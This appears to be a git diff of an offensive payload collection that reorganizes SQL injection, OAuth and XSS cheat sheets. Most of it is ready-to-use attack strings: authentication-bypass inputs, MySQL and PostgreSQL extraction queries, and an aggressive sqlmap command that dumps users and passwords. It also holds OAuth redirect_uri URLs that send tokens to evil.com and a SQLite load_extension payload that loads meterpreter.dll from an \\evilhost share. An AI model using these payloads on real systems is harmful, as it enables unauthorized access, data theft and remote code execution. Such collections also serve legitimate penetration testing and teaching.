diff --git a/OAuth/README.md b/OAuth/README.md new file mode 100644 index 0000000..e3efb9c --- /dev/null +++ b/OAuth/README.md @@ -0,0 +1,33 @@ +# OAuth 2 - Common vulnerabilities + +## Grabbing OAuth Token via redirect_uri +``` +https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful +https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost +https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com +https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com +``` +Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri: +``` +https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com +``` + +## Executing XSS via redirect_uri +``` +https://example.com/oauth/v1/authorize?[...]&redirect_uri=data%3Atext%2Fhtml%2Ca&state= +``` + +## OAuth private key disclosure +Some Android/iOS app can be decompiled and the OAuth Private key can be accessed. + +## Authorization Code Rule Violation +``` +The client MUST NOT use the authorization code more than once. +If an authorization code is used more than once, the authorization server MUST deny the request +and SHOULD revoke (when possible) all tokens previously issued based on that authorization code. +``` + +## Thanks to +* http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html +* http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html +* http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html diff --git a/README.md b/README.md index 65f3a01..abc1777 100644 --- a/README.md +++ b/README.md @@ -8,6 +8,10 @@ Last modifications : * Methodology added * AWS Bucket added + +Extract nice bypass from https://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/ + + # Tools * [Web Developper](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/) diff --git a/SQL injection/Authentication Bypass.txt b/SQL injection/Authentication Bypass.txt deleted file mode 100755 index 527b2b2..0000000 --- a/SQL injection/Authentication Bypass.txt +++ /dev/null @@ -1,77 +0,0 @@ -'-' -' ' -'&' -'^' -'*' -' or ''-' -' or '' ' -' or ''&' -' or ''^' -' or ''*' -"-" -" " -"&" -"^" -"*" -" or ""-" -" or "" " -" or ""&" -" or ""^" -" or ""*" -or true-- -" or true-- -' or true-- -") or true-- -') or true-- -' or 'x'='x -') or ('x')=('x -')) or (('x'))=(('x -" or "x"="x -") or ("x")=("x -")) or (("x"))=(("x -or 1=1 -or 1=1-- -or 1=1# -or 1=1/* -admin' -- -admin' # -admin'/* -admin' or '1'='1 -admin' or '1'='1'-- -admin' or '1'='1'# -admin' or '1'='1'/* -admin'or 1=1 or ''=' -admin' or 1=1 -admin' or 1=1-- -admin' or 1=1# -admin' or 1=1/* -admin') or ('1'='1 -admin') or ('1'='1'-- -admin') or ('1'='1'# -admin') or ('1'='1'/* -admin') or '1'='1 -admin') or '1'='1'-- -admin') or '1'='1'# -admin') or '1'='1'/* -1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 -admin" -- -admin" # -admin"/* -admin" or "1"="1 -admin" or "1"="1"-- -admin" or "1"="1"# -admin" or "1"="1"/* -admin"or 1=1 or ""=" -admin" or 1=1 -admin" or 1=1-- -admin" or 1=1# -admin" or 1=1/* -admin") or ("1"="1 -admin") or ("1"="1"-- -admin") or ("1"="1"# -admin") or ("1"="1"/* -admin") or "1"="1 -admin") or "1"="1"-- -admin") or "1"="1"# -admin") or "1"="1"/* -1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 \ No newline at end of file diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md new file mode 100644 index 0000000..6515ee5 --- /dev/null +++ b/SQL injection/MySQL Injection.md @@ -0,0 +1,60 @@ +# MYSQL Injection + +##MySQL Union Based +``` +UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata +UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=... +UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=... +UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+... +``` + +##MySQL Error Based - Basic +``` +(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) +'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' +``` + +##MYSQL Error Based - UpdateXML function +``` +AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)- +AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)-- +AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)-- +AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)-- +AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)-- +``` + +##MYSQL Error Based - Extractvalue function +``` +AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- +AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))-- +AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))-- +AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))-- +AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- +``` + +##MYSQL Blind with MAKE_SET +``` +AND MAKE_SET(YOLO<(SELECT(length(version()))),1) +AND MAKE_SET(YOLO=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)# +(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)# +``` \ No newline at end of file diff --git a/SQL injection/PostgreSQL Injection.md b/SQL injection/PostgreSQL Injection.md new file mode 100644 index 0000000..ad4d208 --- /dev/null +++ b/SQL injection/PostgreSQL Injection.md @@ -0,0 +1,9 @@ +# POSTGRESQL + +##PostgreSQL Error Based - Basic +``` +,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) +,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- +,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- +,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) +``` \ No newline at end of file diff --git a/SQL injection/README.md b/SQL injection/README.md index 9b29418..9cf86f8 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -1,8 +1,12 @@ # SQL injection A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application -## Authentication bypass and Entry point detection +## SQL injection using SQLmap +``` +sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs +``` +## Entry point detection Detection of an SQL injection entry point ``` ' @@ -22,103 +26,88 @@ Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') ``` - -Authentication bypass - use the file "Authentication Bypass.txt" +## Authentication bypass ``` -SELECT id FROM users WHERE username='input1' AND password='input2' -SELECT id FROM users WHERE username='' or true-- AND password='input2' +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 ``` - -# MYSQL -MySQL Union Based -``` -UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata -UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=... -UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=... -UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+... -``` - - -MySQL Error Based - Basic -``` -(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) -'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' -``` - -MYSQL Error Based - UpdateXML function -``` -AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)- -AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)-- -AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)-- -AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)-- -AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)-- -``` - -MYSQL Error Based - Extractvalue function -``` -AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- -AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))-- -AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))-- -AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))-- -AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- -``` - -MySQL Blind with MAKE_SET -``` -AND MAKE_SET(YOLO<(SELECT(length(version()))),1) -AND MAKE_SET(YOLO=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)# -(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)# -``` - -# POSTGRESQL - -PostgreSQL Error Based - Basic -``` -,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) -,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- -,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- -,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) -``` - -# SQLite -Remote Command Execution using SQLite command - Attach Database -``` -ATTACH DATABASE ‘/var/www/lol.php’ AS lol; -CREATE TABLE lol.pwn (dataz text); -INSERT INTO lol.pwn (dataz) VALUES (‘’);-- -``` - -Remote Command Execution using SQLite command - Load_extension -``` -UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- -``` -Note: By default this component is disabled - - -# Other usefull payloads - -Polyglot injection (multicontext) +## Polyglot injection (multicontext) ``` SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ ``` diff --git a/SQL injection/SQLite Injection.md b/SQL injection/SQLite Injection.md new file mode 100644 index 0000000..6981711 --- /dev/null +++ b/SQL injection/SQLite Injection.md @@ -0,0 +1,14 @@ +# SQLite + +##Remote Command Execution using SQLite command - Attach Database +``` +ATTACH DATABASE ‘/var/www/lol.php’ AS lol; +CREATE TABLE lol.pwn (dataz text); +INSERT INTO lol.pwn (dataz) VALUES (‘’);-- +``` + +##Remote Command Execution using SQLite command - Load_extension +``` +UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- +``` +Note: By default this component is disabled \ No newline at end of file diff --git a/XSS injection/README.md b/XSS injection/README.md index 7cdd819..62a9e9f 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -67,7 +67,7 @@ Base64 encoded -With an additionl URL +With an additional URL ``` @@ -254,6 +254,13 @@ Bypass parenthesis for string - Firefox alert`1` ``` + +Bypass onxxxx= blacklist +``` + + +``` + Bypass onxxx= filter with a null byte/vertical tab - IE/Safari ```